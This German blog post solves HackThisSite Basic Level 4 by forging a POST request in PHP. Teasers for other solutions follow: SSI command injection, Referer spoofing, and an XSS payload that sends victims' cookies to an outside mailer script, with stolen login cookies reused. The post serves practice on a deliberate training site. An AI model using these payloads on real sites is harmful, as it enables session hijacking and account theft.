Direkt zum Hauptbereich

hackthissite.org Level 4 Basic Lösung

So nun wird es etwas umständlicher. Hier gibt es einen Button mit dem man sich dass
Passwort zusenden lassen kann falls man es vergessen hat.
So nu den Quelltext öffnen. Die Zeilen 98,99





Wie man hier sieht wird das ganze an eine email Adresse versendet, welche über einen Post Parameter übergeben wird. Hier im Spiel wird keine Email versendet, sondern wenn die Post anfrage eine Andere Email Adresse als diese enthält dann zeigt dass Skript dass Passwort an.
Ich habe mich für die Lösung mittels PHP Skript entschieden, da dies sehr komfortabel ist.
Das Listing level4.php kann man downloaden.
Ich erläutere mal das vorgehen dieses Sriptes:

Mittels fsockopen stelle ich zuerst eine Verbindung zum host her,
In unserem Fall jetzt:
$host = "hackthissite.org";

Wenn dies klappt dann fordere ich die folgende Seite an:
$page = "missions/basic/4/level4.php";

Damit ich jetzt auch dass Passwort angezeigt bekomme muss ich noch einen Wert
mittels Post übergeben. Das Feld heißt "to" wie oben im Quellcode und der Wert ist
eine e-mail Adresse. Auf jeden fall etwas anderes als jetzt. ;-)
Hier ist die HTTP-Anfrage im klartext:


POST /$page << Methode Post, Seite $page
HTTP/1.1\r\nHost:$host\r\n --Http Version, Host
Cookie:".$pair."\r\n --Cookie $pair (PHPSESSID=mb13p1gkbhdleo9uede4rntu32)
Content-type: application/x-www-form-urlencoded\r\n --Was wird übertragen
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0\r\n
Content-length: ".strlen($query)."\r\n --länge der Daten, anzahl der Zeichen
Connection: close\r\n\r\n.$query --$query ist hier to=irgend@etwas.ya



So und hier ist der Link unter welchem ihr das php Skript herunterladen könnt.

Kommentare

Beliebte Posts aus diesem Blog

hackthissite.org Level 8 Basic Lösung

Hier ist ein eingabeformular in welches du deinen Namen schreiben sollst damit es eine Datei anlegen kann. Zum besseren Verständniss einfach mal testen, also "Mustermann" und auf submit klicken. Nun erscheint der Text: Your file has been saved. Please click here view the file. Hier ist die URL der Datei, welche angelegt wurde: http://www.hackthissite.org/missions/basic/8/tmp/mnxdljrz.shtml Genau, es ist eine shtml Datei also ein Server Side Include (SSI) damit kann man Befehle auf dem Server ausführen lassen und das ergebniss wird dann dem client übergeben! Hier musst du aber das Verzeichniss auslesen damit wir informationen über den Inhalt bekommen. Geb nun einfach mal folgendes in das Feld für den Namen ein: Richtig, ls bei unix/linux "list directory" zeigt den Inhalt eines Verzeichnisses an. Das neu hinzugefügte hier ist "ls ../" ../ heißt ein Verzeichniss nach oben. Also nicht in http://www.hackthissite.org/missions/basic/...

hackthissite.org Level 5 Basic Lösung

Level 5 ist fast gleich wie der Level 4 nur mit dem kleinen Unterschied dass das Skript auf dem Server nun auch schaut woher die Anfrage kommt. Es überprüft also die Referer Url. Damit wir dies umgehen können wird das Skript aus 4 nur Modifiziert. Der HTTP Anfrage wird folgende Zeile hinzugefügt: Referer:http://www.hackthissite.org/missions/basic/5/index.php\r\n So und schon ist auch dass Problem behoben! Das Skript level5.php gibts auch zum Download.

HTS realistic 9, the Codes for the Challenge!

Here are the javascript codes for HTS Level 9: 1. code, take a look at the cookie: javascript:alert(document.cookie); 2. The xss exploit insert into the message to mr. crap: </textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script> 3. The code to use the stolen cookie data: javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1"; Now you can move the money!! 4. Deleting the session data. Log out and go to the main page of crappy soft. Go to the mailing list form. Now you need an Firefox extension like UrlParams or an Proxy with freeze function. Or you manipulate the Post data with an faked http header. How to fake http header with PHP you can take a look at this page: http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html But it is written in german. The faste...